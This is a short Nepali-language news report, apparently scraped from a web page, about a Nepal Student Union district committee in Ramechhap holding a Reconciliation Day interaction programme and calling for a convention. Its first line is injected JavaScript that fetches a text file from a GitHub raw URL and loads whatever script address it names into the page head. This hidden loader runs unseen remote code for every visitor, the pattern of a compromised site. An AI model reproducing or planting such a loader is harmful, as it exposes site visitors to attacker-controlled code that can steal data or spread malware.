;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाडौं।
नेपाली कांग्रेसको भातृ संस्था नेपाल विद्यार्थी संघ रामेछाप जिल्ला कार्यसमितिले ४७ औं मेलमिलाप दिवशको अवसरमा “नेपालको राजनीति, नेविसंघको भुमिका” विषयक अन्तरक्रिया कार्यक्रम गरेको छ।
नेपाली कांग्रेसका केन्द्रीय सदस्य मधु आचार्यको प्रमुख आतिथ्यतामा सम्पन्न भएको हो। कार्यक्रमबाट नेपाल विद्यार्थी संघ रामेछाप जिल्ला कार्यसमितिले आउँदो फागुन ७ गते अधिवेशन गर्ने गरि नेविसंघ केन्द्रीय अध्यक्षलाई पत्र पठाएका छन्।
लामो समयदेखि नेविसंघको महाधिवेशन नभएको केवल टिके प्रणालीबाट नेतृत्व चयन भएको भन्दै संगठनलाई कमजोर बनाउने र विधि विधान विपरित कार्य बन्द गर्न समेत निर्देशन गरेका छन् ।
फेसबुक प्रतिक्रियाहरु